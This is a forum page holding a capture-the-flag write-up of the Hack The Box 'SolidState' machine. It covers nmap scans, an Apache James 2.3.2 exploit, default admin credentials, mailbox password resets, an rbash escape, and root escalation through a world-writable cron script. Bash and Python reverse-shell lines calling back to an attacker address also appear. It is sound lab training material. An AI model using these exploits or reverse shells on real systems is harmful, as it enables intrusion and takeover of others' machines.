Преминете към съдържанието

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

Търсене в общността

Showing results for tags 'solidstate'.

  • Търти по таг

    Напиши таг и в края сложи запетая
  • Търси по автор

Тип на съдържание


Форум

  • ЗА ФОРУМА / ABOUT THE FORUM
    • Условия за ползване, препоръки и работа с форумите
  • ИНФОРМАЦИОННА СИГУРНОСТ / INFORMATION SECURITY
    • Пенетрейшън тестове
    • Тестове за социално инженерство
    • Експлойти
    • Инструменти
    • Вируси
    • Програмиране
    • Криптография
    • Сертифициране
    • След дъжд-качулка :)
    • Безжични мрежи, мобилни устройства и друг хардуер
    • Роботика и Дронове
    • Физическа сигурност
    • Поверителност | Privacy
  • Ресурси / Resources
    • Новини: По света и у нас
    • Уроци
    • Състезания за хакери
    • Книги, филми, списания
    • Интересни събития
  • ДРУГИ / OTHERS
    • Кариерно развитие
    • Продавалник (Купува/Продава, Търси/Предлага)
    • Съответствие, наредби и стандарти
    • Уеб дизайн
    • Оф-Топик
  • Булхак Академи на Кали Линукс
  • Bodyguard and Security Association на Общи условия

Блогове

  • Булхак Академи на Видеа - YouTube
  • Булхак Академи на HTB - WriteUps
  • Bodyguard and Security Association на Блог

Намери резултати в...

Намери резултати които съдържат...


дата на създаване

  • Start

    Край


Последно обновено

  • Start

    Край


Filter by number of...

Регистриран

  • Start

    Край


Група


За мен


Telegram


Уебсайт


Фейсбук


Интереси


Локация

  1. h3xu

    SolidState

    # ENUMERATION ## NMAP The scan returned multiple interesting services # nmap -p- -sV -sC -o solidstate.txt --script vuln 10.10.10.51 Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:47 EDT Nmap scan report for 10.10.10.51 Host is up (0.050s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) 25/tcp open smtp JAMES smtpd 2.3.2 | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE |_sslv2-drown: 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51 | Found the following possible CSRF vulnerabilities: | | Path: http://10.10.10.51:80/ | Form id: name | Form action: # | | Path: http://10.10.10.51:80/index.html | Form id: name | Form action: # | | Path: http://10.10.10.51:80/services.html | Form id: name | Form action: # | | Path: http://10.10.10.51:80/about.html | Form id: name |_ Form action: # |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /README.txt: Interesting, a readme. |_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)' |_http-server-header: Apache/2.4.25 (Debian) | http-sql-injection: | Possible sqli for queries: | http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/ie/?C=D%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/ie/?C=M%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/ie/?C=S%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/ie/?C=N%3bO%3dD%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider | http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider |_ http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 110/tcp open pop3 JAMES pop3d 2.3.2 |_sslv2-drown: 119/tcp open nntp JAMES nntpd (posting ok) |_sslv2-drown: 4555/tcp open james-admin JAMES Remote Admin 2.3.2 Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel ## Port 25 SMTP We have an smtp services running. This {[VRFY EXPN RCPT - pentest monkey](https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet)} explains how we could connect and test smtp service on port 25. # telnet 10.10.10.51 25 Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. 220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT) VRFY 502 5.3.3 VRFY is not supported EXPN 502 5.3.3 EXPN is not supported RCPT 503 5.5.0 Need MAIL before RCPT Since the service does not support the first two protocols we're going to use RCPT. $ /usr/share/legion/scripts/smtp-user-enum.pl -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51 Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... RCPT Worker Processes ......... 5 Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt Target count ............. 1 Username count ........... 168 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Thu Apr 15 06:23:54 2021 ######### ######## Scan completed at Thu Apr 15 06:24:02 2021 ######### 0 results. 168 queries in 8 seconds (21.0 queries / sec) I have also tried enumerating for email addresses by adding "-D 10.10.10.51" and "-D solid-state-security.com" but again with no success. ## Port 80 HTTP The nmap scan reveals a web service running. Let's try to find hidden directories/files. The scan already reported some possibly interesting directories, however, upon checking them - did not find anything important. #### Dirbuster ![[solidstate dirbuster.PNG]] #### sqlmap I have tested the js false-positive just for the sake of it, and proved that it is not injectible. ## Port 4555 tcp admin-James #### Searchsploit We can't but notice that the exploits are for the same version as the one running on the machine. # searchsploit JAMES --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow | windows/remote/944.c --------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results The following picture is from the RCE python exploit. It seems the default credentials are root:root. Let's test it: # Exploitation ![[Pasted image 20210415135840.png]] $ python 35513.py 10.10.10.51 1 ⨯ [+]Connecting to James Remote Administration Tool... [+]Creating user... [+]Connecting to James SMTP server... [+]Sending payload... [+]Done! Payload will be executed once somebody logs in. Now, in order to execute the payload we need to find a way to login to the machine. There is an smtp service running and we know the default credentials root:root :```bash $ telnet 10.10.10.51 4555 130 ⨯ Trying 10.10.10.51... Connected to 10.10.10.51. Escape character is '^]'. JAMES Remote Administration Tool 2.3.2 Please enter your login and password Login id: root Password: root Welcome root. HELP for a list of commands help Currently implemented commands: help display this help listusers display existing accounts countusers display the number of existing accounts adduser [username] [password] add a new user verify [username] verify if specified user exist deluser [username] delete existing user setpassword [username] [password] sets a user's password setalias [user] [alias] locally forwards all email for 'user' to 'alias' showalias [username] shows a user's current email alias unsetalias [user] unsets an alias for 'user' setforwarding [username] [emailaddress] forwards a user's email to another email address showforwarding [username] shows a user's current email forwarding unsetforwarding [username] removes a forward user [repositoryname] change to another user repository shutdown kills the current JVM (convenient when James is run as a daemon) quit close connection listusers Existing accounts 7 user: james user: ../../../../../../../../etc/bash_completion.d user: root user: thomas user: john user: mindy user: mailadmin setpassword mailadmin mailadmin Password for mailadmin reset exit Unknown command exit quit Bye Connection closed by foreign host. Cool, I have logged onto the service by using default credentials, we understood what users exist, and we were able to change passwords. Now I am going to access the account for mailadmin since It looks the most juicy account. 1. Credentials mailadmin:mailadmin ![[Pasted image 20210415214145.png]] 2. It will prompt you to a window that says that it uses plain text and not encrypted. Confirm and continue. 3. Ok, apparently the mailadmin account was a waste of time, lol :D. Let's repeat the process for the rest of the accounts ( click set up another account) and hope we get something out of it. listusers Existing accounts 7 user: james user: ../../../../../../../../etc/bash_completion.d user: root user: thomas user: john user: mindy user: mailadmin setpassword mindy mindy Password for mindy reset 4. Mindy's account has a welcoming and an access emails which contains a password. ![[Pasted image 20210415214939.png]] Ok, so upon logging in through ssh with the following credentials: mindy:P@55W0rd1!2@ , the python exploit runs and a bash_completion file is created. However, we're put in a rbash shell. $ ssh [email protected] Received: from 10.10.14.5([10.10.14.5]) by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 902 for <../../../../../../../../etc/bash_completion.d@localhost>; Thu, 15 Apr 2021 07:11:09 -0400 (EDT) Date: Thu, 15 Apr 2021 07:11:09 -0400 (EDT) From: [email protected] $ whoami -rbash: whoami: command not found I have managed finally to escape the restrictive shell by adding "-t bash". $ man ssh </deleted> -t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services. Multiple -t options force tty alloca‐ tion, even if ssh has no local tty. </deleted> ssh [email protected] -t bash [email protected]'s password: ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls bin user.txt ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami mindy # Privilege escalation #### Enumeration $ bash linenum.sh > output.txt I did not manage to find anything interesting apart from some system ports that are open. Next script I'd like to try is probably unix-priv-check from [pentestmonkey](http://pentestmonkey.net/tools/audit/unix-privesc-check) however, the box did not have strings which is a requirement for it to run. #### writeable files/directories $ find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null -rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py $ cat tmp.py #!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') except: sys.exit() NICE! We have a root-owned file which we could modify and execute. Let's escalate. Firstly, I have tried to get a reverse shell ${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ls newfile.txt ${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd opt bash: cd: opt: No such file or directory ${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cd /opt ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ nano tmp.py ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date Thu Apr 15 16:04:56 EDT 2021 ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py #!/usr/bin/env python import os import sys try: os.system('bash -c "sh -i >& /dev/udp/10.10.14.5/1234 0>&1"') except: sys.exit() ${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ date Thu Apr 15 16:05:13 EDT 2021 I have proven myself that cron executes the file every minute by writing into the tmp.py: !/usr/bin/env python import os import sys try: os.system('touch /tmp/shell.py;python shell.py') except: sys.exit() After a while, a file was created in /tmp/. I have edited the file with the python script from the [reverse shell sentrywhale](https://sentrywhale.com/documentation/reverse-shell) website: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.5",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) Catch the shell. $ nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 39694 bash: cannot set terminal process group (3597): Inappropriate ioctl for device bash: no job control in this shell root@solidstate:~# ls ls file.py root.txt

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy